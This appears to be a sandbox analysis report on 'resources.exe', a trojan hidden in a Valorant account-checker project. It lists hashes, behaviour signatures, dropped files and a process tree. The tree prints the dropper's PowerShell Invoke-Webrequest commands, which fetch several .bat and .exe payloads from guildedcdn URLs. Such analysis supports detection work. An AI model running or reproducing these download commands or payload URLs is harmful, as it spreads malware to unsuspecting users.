11ffb46ab612ed07fa2cfdec7b0e26adaee8695dcd1141a7a47bc545630c7212

Analysis

max time kernel
146s
max time network
159s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
24/02/2024, 11:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Valorant-Checker-Fast-Api-main/Valorant Checker/py/resources.exe
Size

65KB
MD5

45a75aa481a7148a837086f41798e847
SHA1

9a22f26b76ac3813f1130c4d29a11dc1179b05cb
SHA256

5843142659449503fcb25e25c423d3d42be85d4865b1c0373e1442e118e3e509
SHA512

bc8389f0544956921daff9267c2c783329bb134aba67afe360bbce794ade3820930f3fc40a055daab9eae015d27274c44b1a989a8ea257550b0df26351ceff05
SSDEEP

1536:l1jpfHn5T82s45tlDqwIdvKKBLutvfFoV/XUuP:lvfH5TZsYnjIdbCNNoV/Xh

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 8 IoCs

flow	pid	Process
2	3864	powershell.exe
4	424	powershell.exe
5	72	powershell.exe
6	2288	powershell.exe
7	4004	powershell.exe
8	1404	powershell.exe
9	1040	powershell.exe
10	2340	powershell.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
3780	timeout.exe
3856	timeout.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
3864	powershell.exe
3864	powershell.exe
424	powershell.exe
424	powershell.exe
72	powershell.exe
72	powershell.exe
2288	powershell.exe
2288	powershell.exe
4004	powershell.exe
4004	powershell.exe
1404	powershell.exe
1404	powershell.exe
1040	powershell.exe
1040	powershell.exe
2340	powershell.exe
2340	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3864	powershell.exe
Token: SeDebugPrivilege	424	powershell.exe
Token: SeDebugPrivilege	72	powershell.exe
Token: SeDebugPrivilege	2288	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	2340	powershell.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 4736 wrote to memory of 4272	4736	resources.exe	77
PID 4736 wrote to memory of 4272	4736	resources.exe	77
PID 4736 wrote to memory of 4272	4736	resources.exe	77
PID 4272 wrote to memory of 3864	4272	cmd.exe	79
PID 4272 wrote to memory of 3864	4272	cmd.exe	79
PID 4272 wrote to memory of 3864	4272	cmd.exe	79
PID 4272 wrote to memory of 424	4272	cmd.exe	80
PID 4272 wrote to memory of 424	4272	cmd.exe	80
PID 4272 wrote to memory of 424	4272	cmd.exe	80
PID 4272 wrote to memory of 72	4272	cmd.exe	81
PID 4272 wrote to memory of 72	4272	cmd.exe	81
PID 4272 wrote to memory of 72	4272	cmd.exe	81
PID 4272 wrote to memory of 2288	4272	cmd.exe	82
PID 4272 wrote to memory of 2288	4272	cmd.exe	82
PID 4272 wrote to memory of 2288	4272	cmd.exe	82
PID 4272 wrote to memory of 4004	4272	cmd.exe	83
PID 4272 wrote to memory of 4004	4272	cmd.exe	83
PID 4272 wrote to memory of 4004	4272	cmd.exe	83
PID 4272 wrote to memory of 1404	4272	cmd.exe	84
PID 4272 wrote to memory of 1404	4272	cmd.exe	84
PID 4272 wrote to memory of 1404	4272	cmd.exe	84
PID 4272 wrote to memory of 3856	4272	cmd.exe	85
PID 4272 wrote to memory of 3856	4272	cmd.exe	85
PID 4272 wrote to memory of 3856	4272	cmd.exe	85
PID 4272 wrote to memory of 1040	4272	cmd.exe	86
PID 4272 wrote to memory of 1040	4272	cmd.exe	86
PID 4272 wrote to memory of 1040	4272	cmd.exe	86
PID 4272 wrote to memory of 3780	4272	cmd.exe	87
PID 4272 wrote to memory of 3780	4272	cmd.exe	87
PID 4272 wrote to memory of 3780	4272	cmd.exe	87
PID 4272 wrote to memory of 2340	4272	cmd.exe	88
PID 4272 wrote to memory of 2340	4272	cmd.exe	88
PID 4272 wrote to memory of 2340	4272	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe
"C:\Users\Admin\AppData\Local\Temp\Valorant-Checker-Fast-Api-main\Valorant Checker\py\resources.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4736
- C:\Windows\SysWOW64\cmd.exe
  "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\d59630ce-fee0-4f57-bf10-6f82ed979f6f.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/50b98ed3895545b2b72b28966cfa2b0d-Full.zip' -OutFile installer2.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3864
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/c0c5cf18ed5b12d0cf2e77312e553328-Full.zip' -OutFile uuac.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:424
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b65cd9956dfe1877c72ffe687fc632b4-Full.zip' -OutFile israil.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:72
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/e000e033786867fa9caa5d9d6728384a-Full.zip' -OutFile israil2.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/9947ba16f06abcff429e922c49790337-Full.zip' -OutFile bes.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4004
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/b00ef4b757bc25a0f41c3d74961ff9a0-Full.zip' -OutFile es.bat"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 2
    3⤵
    - Delays execution with timeout.exe
    PID:3856
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/123bdf05b4b261644ff4579b8bd78806-Full.zip' -OutFile RunNihaiersion.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 8
    3⤵
    - Delays execution with timeout.exe
    PID:3780
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-Webrequest 'https://img.guildedcdn.com/ContentMediaGenericFiles/05b73b535c4337c16fc3f039c1b30dc1-Full.zip' -OutFile RunihaiVersion.exe"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2340

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
c0636f2d138baca01dbb2eedb99bf3d5

SHA1
3b927899db0f3e2cb510782592887dc02fc3e400

SHA256
10973e727e5b0eb3f12aba60a682d66e79dfd86e4b6cfc454fd8df70c6e1fa8a

SHA512
0187a6ccb6428fb24ad4bc4ca14e7ce6f40ae6ca4f352f8e86a15288deb05cb4dd317ef8e9d04dc9ffb24407ecf0924af2c7910830c79366f7e4e48cb4b82b1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
4d3ae3880501aec037c25ec8cdeb6fde

SHA1
386bd6e78571dd445e34da0a66bd0f320e08e42b

SHA256
bc6830ed2f131c53aadf6ec18d6f2f5214964fe21d4faf180ff6a054f119c28a

SHA512
bf371fa6ec11fdd37c14bba1e24dd43312e68c0e34a46edb6250efed0c479d2aed4131736a35ea7ebc0f82e367cb3271dc3bc3556a787e3229784b7182f882af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
aa4c97e649e9be023546bb5ca969b0b6

SHA1
fdbfbd329aa4569a7a6c003c4b1782f2c0030092

SHA256
7864ef2a9b300f36a5ed0a703219cf425994cc1a0ca0be4de9356fb846b3db55

SHA512
5fdf12214cc17a41aeea2ecabf30a6a94f6a62901638d111e2cc8af3777b1cd858322f499512dba4029022b687e279a1fad43e1ba2ccc4380299895290aab5f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8617bbb4a78e3f7849b645660916d4a3

SHA1
5c445ffd3e0986674c79043da16905ed86807cc9

SHA256
705d888d7ba4bfa19339d418266d5d5f28dfbdb210cf624f5a3084eb5ae11952

SHA512
b9540959c519428cbc68d171a247af881ae32389c8d5f7754c3f2163091570c827d4c1987c226344994019d372c8428a847cdd84c6e0eca55a0d18580d481662

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
cbc3d2e92f9928ba86266c6e411d1c46

SHA1
cc8fc4c8e45ca1eeeaba7e05fd344ef040333358

SHA256
d2d0081f7e40f9dc359a6b85bd09515d7f8779a37511e3607904a4856efe188a

SHA512
549e14a0c67e5938794c9a5bad7c1f998e1970d4bcb029cb7afa86e30750cd7df220dea50e6f4b3809a95d988298a77e754eb97fe2dbf99ae4fc65dd2ee2aae6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
138951381e66e074170c8473c8a66d83

SHA1
36e3c4fd8782f0b663d85d2b6eda232d47750230

SHA256
b363fac630649f7e43f00f628122cc748c45112aef3edf19abcce133a041a4cc

SHA512
bbec3a3b0ef8fa38bcfbac4a97f38c166a7c13b35545992e7789f381b7e08f4e1c3a0dfc5387e3fcfd9144bbce346ffabbdc664d5e1f256af949f09551844243

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6665ec1c16cf5db6aab5991bf7d4fae7

SHA1
76755129f6ff23cb106726de4295a204f55dc144

SHA256
c1196ec4143dc19051bf5abe23f8ecec03ad4435655ecfa51a7d0f86b422bc82

SHA512
e81c5a080b6864cff3745346d54845d93d1286be4a8dd1e73b61d846cb8996d6b3539bfce8915543e4c8e1e494cbd896c5762229c0f799f3f7025693c7ce226b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
eb91f18a259fbee8740ae89dc9d504a5

SHA1
734a13e4fa4286996baa3f04f9c0080642c8c4f0

SHA256
ec35caf30fb62d5b5a5f932a20ba5abadae7ce61ff76522d13dd968305d16349

SHA512
a064fbcf5e2e988d9d85f17e19ead6f4810cc393389c594440efcbbca3a5e2a4fae3734b2255d4d3a0bfe86877952ab511930151f47515f9db4af16b2ffdad3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tidg1y0s.gz2.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\d59630ce-fee0-4f57-bf10-6f82ed979f6f.bat

Filesize
1KB

MD5
d0cec99ca3a717c587689ebf399662c4

SHA1
1d4bbaf8079912ada46a6fa8693d8c20d5ec5b66

SHA256
b1ae110ef84ecec90a75742ca29adc0704b67abe8f093aa5a959ea0864766228

SHA512
99b21193db6615a33eb738c246229e9a7efcaf03fcab24654d67680396155a0c62cbc834078687d75d1892b1708383eafeda4f87e86b33bd827b18bc988122f7

Download Submit
memory/72-47-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/72-48-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/72-57-0x0000000005F50000-0x00000000062A7000-memory.dmp

Filesize
3.3MB

Download
memory/72-61-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/72-59-0x0000000004F10000-0x0000000004F20000-memory.dmp

Filesize
64KB

Download
memory/424-44-0x00000000049F0000-0x0000000004A00000-memory.dmp

Filesize
64KB

Download
memory/424-30-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/424-32-0x00000000049F0000-0x0000000004A00000-memory.dmp

Filesize
64KB

Download
memory/424-31-0x00000000049F0000-0x0000000004A00000-memory.dmp

Filesize
64KB

Download
memory/424-33-0x0000000005930000-0x0000000005C87000-memory.dmp

Filesize
3.3MB

Download
memory/424-46-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/1040-108-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/1040-107-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/1040-106-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/1040-118-0x0000000002510000-0x0000000002520000-memory.dmp

Filesize
64KB

Download
memory/1040-120-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/1404-93-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/1404-105-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/1404-94-0x0000000005300000-0x0000000005310000-memory.dmp

Filesize
64KB

Download
memory/2288-62-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/2288-76-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/2288-74-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/2288-63-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/2288-64-0x0000000002EC0000-0x0000000002ED0000-memory.dmp

Filesize
64KB

Download
memory/2340-134-0x0000000006780000-0x00000000067CC000-memory.dmp

Filesize
304KB

Download
memory/2340-122-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/2340-123-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/2340-121-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/2340-132-0x0000000005E70000-0x00000000061C7000-memory.dmp

Filesize
3.3MB

Download
memory/2340-135-0x0000000004DB0000-0x0000000004DC0000-memory.dmp

Filesize
64KB

Download
memory/2340-137-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/3864-6-0x00000000031B0000-0x00000000031C0000-memory.dmp

Filesize
64KB

Download
memory/3864-22-0x00000000031B0000-0x00000000031C0000-memory.dmp

Filesize
64KB

Download
memory/3864-28-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/3864-19-0x0000000006190000-0x00000000064E7000-memory.dmp

Filesize
3.3MB

Download
memory/3864-25-0x0000000008B60000-0x0000000009306000-memory.dmp

Filesize
7.6MB

Download
memory/3864-24-0x0000000006BF0000-0x0000000006C0A000-memory.dmp

Filesize
104KB

Download
memory/3864-23-0x0000000007D30000-0x00000000083AA000-memory.dmp

Filesize
6.5MB

Download
memory/3864-4-0x0000000003220000-0x0000000003256000-memory.dmp

Filesize
216KB

Download
memory/3864-9-0x00000000058C0000-0x0000000005926000-memory.dmp

Filesize
408KB

Download
memory/3864-21-0x0000000006720000-0x000000000676C000-memory.dmp

Filesize
304KB

Download
memory/3864-10-0x0000000005930000-0x0000000005996000-memory.dmp

Filesize
408KB

Download
memory/3864-8-0x0000000005820000-0x0000000005842000-memory.dmp

Filesize
136KB

Download
memory/3864-7-0x0000000005A20000-0x000000000604A000-memory.dmp

Filesize
6.2MB

Download
memory/3864-20-0x00000000066F0000-0x000000000670E000-memory.dmp

Filesize
120KB

Download
memory/3864-5-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/4004-78-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/4004-77-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/4004-79-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/4004-92-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/4004-90-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/4004-88-0x0000000005A90000-0x0000000005DE7000-memory.dmp

Filesize
3.3MB

Download
memory/4736-43-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/4736-1-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download
memory/4736-0-0x0000000000BE0000-0x0000000000BF6000-memory.dmp

Filesize
88KB

Download
memory/4736-139-0x00000000750A0000-0x0000000075851000-memory.dmp

Filesize
7.7MB

Download